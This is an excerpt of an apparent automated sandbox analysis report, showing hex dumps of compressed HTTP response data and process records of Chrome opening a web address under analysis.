                                          2025-01-12 00:17:28 UTC15664INData Raw: 1f 8b 08 00 00 00 00 00 00 03 ed bd fb 77 1b d7 75 28 fc bb ff 8a 91 9b 04 80 08 80 0f bd 6c ca 34 97 22 ea 95 8a 92 6b d2 57 b5 29 86 1d 02 43 62 2c 00 83 62 00 51 b4 a9 ac 3a 69 1b f7 75 ef ed 5a c9 6d da a4 69 92 3a 6d 1e 4d bf de b6 69 95 f8 5b e9 0f e9 ba 7f 87 bc dc a4 fd 6e dd ff e1 db af 73 e6 bc 66 00 d9 6e 9a d5 1a 71 44 60 66 bf ce 6b 9f 7d f6 d9 67 9f c5 c5 53 d1 20 1b 24 c3 49 fb d5 fc a9 45 f8 75 3f 19 e7 69 36 8c 56 a3 95 f6 f2 52 fb 0c 3d 8c a7 93 5e 36 ce e1 e1 76 3a 88 ee 64 59 b7 19 dd c8 ef 8d 93 61 74 b9 97 8c 87 c9 fd 66 b4 a9 c8 44 9d 6c 38 19 a7 fb d3 09 a0 10 7a 3f ed 24 c3 3c 01 f4 cd 1b db f4 84 79 be 9a b7 3b d9 e0 a9 a7 ea 07 d3 61 67 82 5c eb 87 fd 6c 3f ee 37 a3 83 b8 03 e8 c7 8d e8 f5 a7 22 f8 4c 8e 47 49 76 10 25 0f 46 d9
                                          Data Ascii: wu(l4"kW)Cb,bQ:iuZmi:mMi[nsfnqD`fk}gS $IEu?i6VR=^6v:dYatfDl8z?$<y;ag\l?7"LGIv%F
                                          2025-01-12 00:17:28 UTC11304INData Raw: 1e de 77 66 95 85 e7 f7 67 2b ac 27 d7 37 a7 e6 d4 37 ad c0 10 73 e2 38 1d a7 43 50 56 27 62 f1 89 ab b5 55 ee d9 08 d7 5e ae b4 fd 76 46 7b f6 a5 55 67 b6 5b 41 7f c9 2f c0 0c 2e 04 5a c1 87 5a a0 e8 1c 6e 9d cf c7 df 82 d6 4a ce bc 1f cc 64 37 53 15 13 19 a5 3f ea 81 3e 5a ad ed bc 65 40 d1 9e 15 15 c5 07 78 d4 54 1c ae 22 4c 22 51 5d 41 05 9c d7 81 8c be 2e f5 54 39 bb 3a 84 bd 09 56 68 f8 37 77 e0 67 66 c1 7b 71 7e a9 4f d7 01 e0 51 0c cb 00 71 8b 7e 2a 38 55 a8 81 b8 14 62 1f 18 30 0a be 7c 39 55 32 8a dc 32 d5 dd 21 07 13 86 48 88 5e b7 c8 4f 50 6f 3a 4f e3 63 28 75 6f b2 15 df 87 3a a4 c9 2d 94 e4 b5 6e 89 ee 31 e4 6d 6b 9d c7 8f ef 79 5d b2 4a 00 73 e6 fb a0 71 ce a2 a1 09 94 8c f2 50 71 b6 7a e9 01 1a d3 25 1d 38 0e ba 69 65 47 df 9e 23 64 8e 76
                                          Data Ascii: wfg+'77s8CPV'bU^vF{Ug[A/.ZZnJd7S?>Ze@xT"L"Q]A.T9:Vh7wgf{q~OQq~*8Ub0|9U22!H^OPo:Oc(uo:-n1mky]JsqPqz%8ieG#dv


                                          Click to jump to process

                                          Click to jump to process

                                          Click to jump to process

                                          Target ID:0
                                          Start time:19:16:39
                                          Start date:11/01/2025
                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                          Imagebase:0x7ff76e190000
                                          File size:3'242'272 bytes
                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:low
                                          Has exited:false

                                          Target ID:2
                                          Start time:19:16:43
                                          Start date:11/01/2025
                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=1976,i,7273462861023531778,15793530550184385695,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                          Imagebase:0x7ff76e190000
                                          File size:3'242'272 bytes
                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:low
                                          Has exited:false

                                          Target ID:3
                                          Start time:19:16:50
                                          Start date:11/01/2025
                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "http://m.ccsurj.org/"
                                          Imagebase:0x7ff76e190000
                                          File size:3'242'272 bytes
                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:low
                                          Has exited:true

                                          No disassembly